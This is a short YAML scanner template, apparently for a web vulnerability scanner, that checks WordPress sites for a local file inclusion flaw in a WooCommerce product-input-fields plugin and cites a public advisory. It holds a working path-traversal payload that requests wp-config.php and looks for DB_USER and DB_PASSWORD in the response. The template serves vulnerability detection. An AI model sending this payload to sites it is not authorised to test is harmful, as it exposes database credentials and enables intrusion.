id: woocommerce-lfi
info:
  name: Wordpress WooCommerce LFI
  risk: High
  confidence: Certain

params:
  - root: '{{.BaseURL}}'

replicate:
  prefixes: 'blog, news, docs'

variables:
  - vul: |
      wp-admin/admin-ajax.php?action=admin_init&alg_wc_pif_download_file=../../../../../../wp-config.php
      wp-admin/admin-post.php?action=admin_init&alg_wc_pif_download_file=../../../../../../wp-config.php

requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}/{{.vul}}
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", 'DB_USER') && StringSearch("response", 'DB_PASSWORD')
  
references:
  - link: https://blog.nintechnet.com/high-severity-vulnerability-fixed-in-product-input-fields-for-woocommerce/
